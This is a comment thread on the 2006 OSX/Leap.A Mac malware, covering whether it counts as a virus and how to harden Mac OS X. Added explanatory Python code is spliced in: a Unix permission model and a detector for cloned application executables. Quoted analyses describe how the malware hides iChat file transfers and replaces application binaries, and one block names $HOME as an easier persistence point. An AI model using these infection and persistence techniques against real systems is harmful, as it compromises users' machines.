    First Mac OS X virus?? I thought the first one was the honor system virus.

    Oh wait, what? Nobody ported the honor system virus to Mac OS X?

    --
    You just got troll'd!
  127. Not a virus? by njyoder · · Score: 1

    I can't believe they updated to say it wasn't one. A virus is just a program that infects other files with itself. A worm is a program that spreads itself using internet connections directly. This program does both of those. Just because it requires the user to run it, doesn't mean it isn't one.

    I'm sick of people who don't know what these terms mean flashing them around. It's a trojan if it doesn't try to spread itself, this does.

    Most windows viruses/worms require the user to execute it manually. In fact, that's 99% of DOS viruses, are you saying most past viruses are just trojans? How do you think those spread? Someone inserts a disk with an infected program, runs it and it injects itself into other programs on the computer. Those other programs are then spread MANUALLY by the user not knowing that they're infected.

    REQUIRING IT TO BE MANUALLY RUN INITIALLY doesn't make it just a trojan.

    McAfee and Sophos have both classified this as a worm/virus. STOP BEING MORONS. It's funny that even the people who read the analysis still managed to talk out of their ass about this and deem it just a trojan.

  128. You're right. by LKM · · Score: 1
    The malware in question does infect applications, changing several parameters and attempting to cause itself to be loaded when they are run (although a bug prevents this from working).

    Interestingly enough, you're right. From Ambrosia: It then copies the application executable to its own resource fork, and replaces the application executable with the OSX/Oomp-A trojan

    That doesn't work eventually, but it actually does try to infect other applications.

  129. Re:Time to get into the habit of read-only filesys by reed · · Score: 1

    I meant to keep the files at mode 555, or on a read-only filesystem. Then, to modify the file, you would need to either chmod them or remount it first, which could be made to loudly notify the user that someone is trying to screw with some important system files.

    Obviously some people would still click OK, but, maybe less.

    Just an idea.

  130. Administrator dialog by Danathar · · Score: 1

    I wish apple would change the pop-up that asks for your administrator password so that the box IS BRIGHT RED, and says something like "A program is asking for SUPER user privileges on your computer. DO NOT click YES unless you initiated this action and understand its consequences"

    Make the default NO and that would scare just about any grandma or newbie computer user into protection.

  131. Re:Time to get into the habit of read-only filesys by argent · · Score: 1

    1. This wouldn't provide ANY more protection than what Mac OS X does already.
    2. This is easily bypassed by storing the malware under $HOME.
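Comments 122, 129 and 131 are really one argument about Unix discretionary access control: /Applications and /Library are group-writable by the admin group, so an admin-group user gets no authentication prompt when something writes there; mode 555 or a read-only mount would block that; and anything under $HOME is writable by its owner regardless. The model below is an added example (not code from the thread or from Apple) that evaluates the owner/group/other rule the way the kernel does and reports which directories each kind of account could modify silently. The uids, gids, directory owners and modes are constructed sample values, chosen to mirror the layout the comments describe, not read from any real system.

```python
"""Who can silently write into /Applications? A pure model of the Unix permission check.

Added example for this thread; all users, groups and modes below are constructed.
"""
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    uid: int
    gids: frozenset  # every group the user belongs to (primary + supplementary)


@dataclass(frozen=True)
class Dir:
    path: str
    owner_uid: int
    owner_gid: int
    mode: int  # permission bits only, e.g. 0o775


def can_write(user: User, d: Dir) -> bool:
    """Unix DAC write check.

    root always passes. Otherwise exactly one class applies: owner if the uid
    matches, else group if any of the user's groups match, else other. Classes
    do not combine: a group member denied by the group bits does not fall
    through to the 'other' bits.
    """
    if user.uid == 0:
        return True
    if user.uid == d.owner_uid:
        return bool(d.mode & stat.S_IWUSR)
    if d.owner_gid in user.gids:
        return bool(d.mode & stat.S_IWGRP)
    return bool(d.mode & stat.S_IWOTH)


# Constructed sample ids: root/wheel, an "admin" group and a "staff" group.
ROOT_UID, WHEEL_GID, ADMIN_GID, STAFF_GID = 0, 0, 80, 20

ROOT = User("root", 0, frozenset({WHEEL_GID}))
ADMIN_USER = User("alice", 501, frozenset({STAFF_GID, ADMIN_GID}))   # admin-group account
STANDARD_USER = User("bob", 502, frozenset({STAFF_GID}))             # non-admin account

# Layout as described in the comments: /Applications and /Library are owned by
# root but group-writable by admin; /System is root:wheel with no group write.
APPLICATIONS = Dir("/Applications", ROOT_UID, ADMIN_GID, 0o775)
LIBRARY = Dir("/Library", ROOT_UID, ADMIN_GID, 0o775)
SYSTEM = Dir("/System", ROOT_UID, WHEEL_GID, 0o755)
SYSTEM_DIRS = (APPLICATIONS, LIBRARY, SYSTEM)

# Comment 129's proposal: the same directory at mode 555.
READ_ONLY_APPS = Dir("/Applications", ROOT_UID, ADMIN_GID, 0o555)

# Comment 131's objection: the user's own directory under $HOME (owner bob).
HOME_APPS = Dir("~bob/Applications", 502, STAFF_GID, 0o755)


def exposure(user: User, dirs=SYSTEM_DIRS):
    """Directories `user` could modify with no password prompt at all."""
    return [d.path for d in dirs if can_write(user, d)]


if __name__ == "__main__":
    for u in (ROOT, ADMIN_USER, STANDARD_USER):
        print(f"{u.name:8} silently writable: {exposure(u)}")
    print("admin vs mode-555 /Applications:", can_write(ADMIN_USER, READ_ONLY_APPS))
    print("standard user vs own ~/Applications:", can_write(STANDARD_USER, HOME_APPS))
```

The two take-aways match the thread: the standard account has no silent write path into the shared directories, while the admin-group account has two; and hardening the shared directories (mode 555 or a read-only mount) does nothing about a location the user owns, which is why a user-writable $HOME remains the easier persistence point and deserves the same monitoring.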

  132. Re:It's not a virus... bzzt. Wrong Fanboi! by 5plicer · · Score: 1

    No, Leap.A does not "[replicate] itself into other executable code or documents". According to http://www.f-secure.com/v-descs/leap_a.shtml,

    Leap.A installs a bundle to '~/InputManagers/apphook' that hooks certain iChat functions. When any of the user's buddies change their status, the worm initiates a file transfer and sends a copy of 'latestpics.tgz'. The file transfer is not visible to the user as the worm hides the transfer status information.
    The worm enumerates all applications on the computer that were used during the last month. Leap.A replaces the main executable of those applications with itself and saves the original file to a resource fork with the same filename. When the application is opened the worm activates first, then it runs the original application from the resource fork.
    --
    The bits on the bus go on and off... on and off... on and off...
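The F-Secure description quoted above gives a defender a concrete artifact to look for: after infection, the main executables of every recently used application are the same bytes, because each one has been replaced by the same infector. The script below is an added example for this thread (not from F-Secure, Ambrosia or Apple): it finds `.app` bundles under a directory, resolves each bundle's main executable from `CFBundleExecutable` in `Contents/Info.plist`, hashes it, and reports any hash shared by two or more bundles, which a healthy system essentially never shows. It also checks for a non-empty resource fork on the executable (the place the quote says the original is stashed), via the `..namedfork/rsrc` path, which only exists on macOS and simply reads as absent elsewhere. The bundle tree and its contents are constructed in a temporary directory; the application names are arbitrary.

```python
"""Find .app bundles whose main executables are byte-identical clones.

Added example for this thread. Sample bundles are constructed in a temp dir.
"""
import hashlib
import os
import plistlib
import tempfile
from collections import defaultdict


def main_executable(bundle):
    """Resolve Contents/MacOS/<CFBundleExecutable> for a bundle, or None."""
    info = os.path.join(bundle, "Contents", "Info.plist")
    try:
        with open(info, "rb") as fh:
            exe_name = plistlib.load(fh).get("CFBundleExecutable")
    except (OSError, plistlib.InvalidFileException):
        return None
    if not exe_name:
        return None
    exe = os.path.join(bundle, "Contents", "MacOS", exe_name)
    return exe if os.path.isfile(exe) else None


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def has_resource_fork(path):
    """True if a non-empty resource fork exists (macOS only; False on other systems)."""
    rsrc = os.path.join(path, "..namedfork", "rsrc")
    try:
        return os.path.getsize(rsrc) > 0
    except OSError:
        return False


def find_bundles(root):
    """Yield .app directories under root without descending into them."""
    for dirpath, dirs, _files in os.walk(root):
        for d in list(dirs):
            if d.endswith(".app"):
                yield os.path.join(dirpath, d)
                dirs.remove(d)


def find_cloned_executables(root, min_count=2):
    """Map sha256 -> sorted bundle paths, for hashes shared by >= min_count bundles."""
    by_hash = defaultdict(list)
    for bundle in find_bundles(root):
        exe = main_executable(bundle)
        if exe:
            by_hash[sha256_of(exe)].append(bundle)
    return {h: sorted(b) for h, b in by_hash.items() if len(b) >= min_count}


def build_sample_tree():
    """Constructed sample: three bundles sharing one executable, one untouched."""
    root = tempfile.mkdtemp(prefix="apps-")
    clone = b"\xcf\xfa\xed\xfe" + b"INFECTOR" * 8      # stand-in for a replaced binary
    apps = {
        "Mail.app": clone,
        "Safari.app": clone,
        "iChat.app": clone,
        "TextEdit.app": b"\xcf\xfa\xed\xfe" + b"TEXTEDIT" * 8,
    }
    for name, content in apps.items():
        macos = os.path.join(root, name, "Contents", "MacOS")
        os.makedirs(macos)
        exe_name = name[:-4]
        with open(os.path.join(root, name, "Contents", "Info.plist"), "wb") as fh:
            plistlib.dump({"CFBundleExecutable": exe_name}, fh)
        with open(os.path.join(macos, exe_name), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for digest, bundles in find_cloned_executables(build_sample_tree()).items():
        print(f"{digest[:12]} shared by {len(bundles)} bundles:")
        for b in bundles:
            exe = main_executable(b)
            print(f"  {b}  resource fork: {has_resource_fork(exe)}")
```

A single shared hash across unrelated vendors' bundles is the signal; the resource-fork check is secondary, since other fork users exist, but an executable that both matches other bundles and carries a large fork is exactly the quoted pattern.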
  133. stop it by Anonymous Coward · · Score: 0

    stop trying to tell us that a trojan is different from a virus. they are the same thing! Spyware, adware, trojans and viruses are all the same thing, they all do something bad! so don't be nit picky about terms you mother fuchers

  134. THAT DIDN'T TAKE LONG by argent · · Score: 1

    Safari will not automatically open things anyway, and will ask you before decompressing anything with an executable in it.

    Oh, Really?

    Yes I can bloody well say "I told you so".

    1. Re:THAT DIDN'T TAKE LONG by goMac2500 · · Score: 1

      Right. This is where you need to go learn what an executable is.

    2. Re:THAT DIDN'T TAKE LONG by argent · · Score: 1

      A UNIX shell script is an executable. That's how the execute bit in UNIX works. That's how the shell (not Terminal.app) knows to execute a file.

      (don't teach your grandfather to suck eggs - I've been writing software for UNIX since 1979, and I was a developer for what became Mac OS X before it was FreeBSD)

  135. Wow, it took a whole FOUR DAYS... by argent · · Score: 1

    Anyway, in this particular case auto-running content is not exploited anyway.

    But it is in this one.

    Wow, it took a whole four days before the next "Open safe files" exploit.

    HELLO, APPLE, CAN YOU GET THE HINT THIS TIME?